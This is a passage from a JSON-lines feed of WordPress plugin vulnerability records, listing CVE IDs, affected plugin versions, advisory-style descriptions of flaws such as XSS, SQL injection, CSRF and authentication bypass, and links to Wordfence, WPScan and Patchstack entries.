escalation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334439\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334439\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hydra-booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hydra-booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93027dd1-f36a-4954-a8d2-b77bbbaef6fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93027dd1-f36a-4954-a8d2-b77bbbaef6fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0711","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_state function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the view state of the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1c43e93-69a3-407e-860e-ab25af5d7177\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1c43e93-69a3-407e-860e-ab25af5d7177\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1323","slug":"yikes-inc-easy-mailchimp-extender","versionImpact":"6.8.8","description":"The Easy Forms for Mailchimp WordPress plugin through 6.8.8 does not sanitise and escape some of its from parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a2af00-719c-4b86-8877-b1d68a589192\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a2af00-719c-4b86-8877-b1d68a589192\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6389","slug":"wordpress-toolbar","versionImpact":"2.2.6","description":"The WordPress Toolbar WordPress plugin through 2.2.6 redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04dafc55-3a8d-4dd2-96da-7a8b100e5a81\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04dafc55-3a8d-4dd2-96da-7a8b100e5a81\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6389.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6389.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1318","slug":"feedzy-rss-feeds","versionImpact":"4.4.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'feedzy_wizard_step_process' and 'import_status' functions in all versions up to, and including, 4.4.2. This makes it possible for authenticated attackers, with Contributor access and above, who are normally restricted to only being able to create posts rather than pages, to draft and publish posts with arbitrary content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181edcec-a57d-4516-935d-6777d2de77ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181edcec-a57d-4516-935d-6777d2de77ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L1022\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L1022\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php#L1053\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php#L1053\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6957","slug":"fluentform","versionImpact":"5.1.9","description":"The Fluent Forms plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.9 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4050403-6b8c-4023-b170-39f3cb68583e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4050403-6b8c-4023-b170-39f3cb68583e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041316%40fluentform%2Ftrunk&old=3025740%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041316%40fluentform%2Ftrunk&old=3025740%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4289","slug":"sailthru-triggermail","versionImpact":"1.1","description":"The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072785de-0ce5-42a4-a3fd-4eb1d1a2f1be\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072785de-0ce5-42a4-a3fd-4eb1d1a2f1be\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4360","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 5.7.2 due to insufficient input sanitization and output escaping on user supplied attributes like 'title_tag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910c0a32-b169-4728-888c-0dfea2066c9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910c0a32-b169-4728-888c-0dfea2066c9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/skins\\\/skin-abetis.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/skins\\\/skin-abetis.php#L164\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9375","slug":"captcha-bank","versionImpact":"4.0.36","description":"The WordPress Captcha Plugin by Captcha Bank plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.36. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba796adc-db76-4b9d-a6f9-f0f51f070240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba796adc-db76-4b9d-a6f9-f0f51f070240?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/captcha-bank\\\/trunk\\\/captcha-bank.php#L1297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/captcha-bank\\\/trunk\\\/captcha-bank.php#L1297\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10038","slug":"wp-strava","versionImpact":"2.12.1","description":"The WP-Strava plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f200526-890c-4a2a-9d8e-334443ef7e0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f200526-890c-4a2a-9d8e-334443ef7e0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/cmanon\\\/wp-strava\\\/blob\\\/5b9499dab0eeada3887e5b64cf471e7978147154\\\/src\\\/WPStrava\\\/Auth.php#L92-L93\",\"name\":\"https:\\\/\\\/github.com\\\/cmanon\\\/wp-strava\\\/blob\\\/5b9499dab0eeada3887e5b64cf471e7978147154\\\/src\\\/WPStrava\\\/Auth.php#L92-L93\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23913","slug":"google-map-professional","versionImpact":"1.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in pankajpragma, rahulpragma WordPress Google Map Professional allows SQL Injection.This issue affects WordPress Google Map Professional: from n\/a through 1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-map-professional\\\/vulnerability\\\/wordpress-google-map-professional-plugin-1-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-map-professional\\\/vulnerability\\\/wordpress-google-map-professional-plugin-1-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13566","slug":"wp-datatable","versionImpact":"0.2.6","description":"The WP DataTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 0.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datatable\\\/trunk\\\/shortcode.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datatable\\\/trunk\\\/shortcode.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231842\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231842\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-datatable\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-datatable\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ad96faa-cbc2-46c3-a8e6-afa6744ada86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ad96faa-cbc2-46c3-a8e6-afa6744ada86?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13839","slug":"staff-directory-pro","versionImpact":"4.3","description":"The Staff Directory Plugin: Company Directory plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/staff-directory-pro\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/staff-directory-pro\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/staff-directory-pro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/staff-directory-pro\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80203516-8546-441a-b51d-2d09968492b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80203516-8546-441a-b51d-2d09968492b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23906","slug":"wordpress-dashboard-twitter","versionImpact":"1.3.2","description":"Missing Authorization vulnerability in wpseek WordPress Dashboard Tweeter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Dashboard Tweeter: from n\/a through 1.3.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-dashboard-twitter\\\/vulnerability\\\/wordpress-wordpress-dashboard-tweeter-plugin-1-3-2-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-dashboard-twitter\\\/vulnerability\\\/wordpress-wordpress-dashboard-tweeter-plugin-1-3-2-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6459","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.89. This is due to missing or incorrect nonce validation on the bsaCreateAdTemplate function. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22fa8290-ebab-4fa4-bcba-0053c3b79f76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22fa8290-ebab-4fa4-bcba-0053c3b79f76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6730","slug":"bonanza-woocommerce-free-gifts-lite","versionImpact":"1.0.0","description":"The Bonanza \u2013 WooCommerce Free Gifts Lite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the xlo_optin_call() function in all versions up to, and including, 1.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set the opt in status to success.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bonanza-woocommerce-free-gifts-lite\\\/trunk\\\/xl\\\/includes\\\/class-xl-opt-in-manager.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bonanza-woocommerce-free-gifts-lite\\\/trunk\\\/xl\\\/includes\\\/class-xl-opt-in-manager.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7a192b-25cc-4041-a72b-34fbd697045b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7a192b-25cc-4041-a72b-34fbd697045b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0685","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_unassign_folders function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin..","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52b27fa-10e8-43d0-be29-774c2f5487ae\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52b27fa-10e8-43d0-be29-774c2f5487ae\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0431","slug":"file-away","versionImpact":"3.9.9.0.1","description":"The File Away WordPress plugin through 3.9.9.0.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdcbd9a3-552d-439e-b283-1d3d934889af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdcbd9a3-552d-439e-b283-1d3d934889af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1317","slug":"feedzy-rss-feeds","versionImpact":"4.4.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to SQL Injection via the \u2018search_key\u2019 parameter in all versions up to, and including, 4.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L2623\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L2623\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4359","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 5.7.2 via the SVG widget and a lack of sufficient file validation in the render_svg function. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a55cfeb3-7632-4a88-ac71-8e119b060721?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a55cfeb3-7632-4a88-ac71-8e119b060721?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/svg-image\\\/widgets\\\/svg-image.php#L847\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/svg-image\\\/widgets\\\/svg-image.php#L847\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9372","slug":"wp-blocks-hub","versionImpact":"1.0.2","description":"The WP Blocks Hub plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d32b2cc-9336-432e-9d2e-67db8b0e3f90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d32b2cc-9336-432e-9d2e-67db8b0e3f90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-blocks-hub\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-blocks-hub\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10245","slug":"relais-2fa","versionImpact":"1.0","description":"The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d476336-e997-4379-a8f6-963ae22b2417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d476336-e997-4379-a8f6-963ae22b2417?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/relais-2fa\\\/trunk\\\/relais.php?rev=2439540#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/relais-2fa\\\/trunk\\\/relais.php?rev=2439540#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9208","slug":"enable-accessibility","versionImpact":"1.4.1","description":"The Enable Accessibility plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-accessibility\\\/tags\\\/1.4.1\\\/includes\\\/accessibility-attachments-alt.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-accessibility\\\/tags\\\/1.4.1\\\/includes\\\/accessibility-attachments-alt.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da125e31-4747-46b7-8a46-a234388035c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da125e31-4747-46b7-8a46-a234388035c0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
